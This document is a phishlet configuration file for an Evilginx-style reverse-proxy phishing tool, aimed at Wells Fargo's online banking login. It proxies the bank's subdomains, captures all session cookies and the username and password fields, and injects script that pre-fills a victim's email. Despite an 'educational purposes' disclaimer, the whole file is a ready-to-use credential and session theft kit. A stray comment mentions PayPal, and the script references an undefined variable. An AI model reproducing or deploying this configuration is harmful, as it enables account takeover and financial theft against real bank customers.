# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
# PLEASE DO NOT MISUSE THIS PHISHLET.

# Email Params can be Triggered By using Below Command.
# lures edit params ID email=test@email.com
# Where ID is lure id number, and test@email.com is your known victim account email address for paypal. 

author: '@lexKingz'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'wellsfargo.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: '', orig_sub: '', domain: 'wellsfargo.com', session: true, is_landing: false, auto_filter: true}
#  - {phish_sub: 'wellsfargoobjects', orig_sub: 'www', domain: 'wellsfargoobjects.com', session: false, is_landing: false}
  - {phish_sub: 'c', orig_sub: 'c', domain: 'wellsfargo.com', session: false, is_landing: false}
  - {phish_sub: 'b.stats', orig_sub: 'b.stats', domain: 'wellsfargo.com', session: false, is_landing: false}
  - {phish_sub: 't', orig_sub: 't', domain: 'wellsfargo.com', session: false, is_landing: false}
  - {phish_sub: 'c6', orig_sub: 'c6', domain: 'wellsfargo.com', session: false, is_landing: false}
  - {phish_sub: 'hnd.stats', orig_sub: 'hnd.stats', domain: 'wellsfargo.com', session: false, is_landing: false}
 
sub_filters:
  - {triggers_on: 'www.wellsfargo.com', orig_sub: 'www', domain: 'wellsfargo.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.wellsfargo.com', orig_sub: 'www', domain: 'wellsfargo.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
#  - {triggers_on: 'www.wellsfargo.com', orig_sub: '', domain: 'wellsfargoobjects.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
#  - {triggers_on: 'www.wellsfargo.com', orig_sub: '', domain: 'wellsfargoobjects.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.wellsfargo.com', orig_sub: 'c6', domain: 'wellsfargo.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.wellsfargo.com', orig_sub: 'c6', domain: 'wellsfargo.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.wellsfargo.com', orig_sub: 'c', domain: 'wellsfargo.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.wellsfargo.com', orig_sub: 'c', domain: 'wellsfargo.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.wellsfargo.com', orig_sub: 'hnd.stats', domain: 'wellsfargo.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.wellsfargo.com', orig_sub: 'hnd.stats', domain: 'wellsfargo.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.wellsfargo.com', orig_sub: 't', domain: 'wellsfargo.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.wellsfargo.com', orig_sub: 't', domain: 'wellsfargo.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.wellsfargo.com', orig_sub: '', domain: 'wellsfargo.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.wellsfargo.com', orig_sub: '', domain: 'wellsfargo.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}

auth_tokens:
  - domain: '.wellsfargo.com'
    keys: ['.*,regexp']
auth_urls:
  - '/myaccount/summary'
  - '/myaccount/.*'     
    
credentials:
  username:
    key: 'j_username'
    search: '(.*)'
    type: 'post'
  password:
    key: 'j_password'
    search: '(.*)'
    type: 'post'

login:
  domain: 'www.wellsfargo.com'
  path: '/auth/login/present'

js_inject:
  - trigger_domains: ["www.wellsfargo.com"]
    trigger_paths: ["/auth/login/present"]
    trigger_params: ["j_username"]
    script: |
      function lp(){
        var j_username = document.querySelector("#j_username");
        if (j_username != null && j_password != null) {
          j_username.value = "{j_username}";
          return;
        }
        setTimeout(function(){lp();}, 100);
      }
      setTimeout(function(){lp();}, 100);
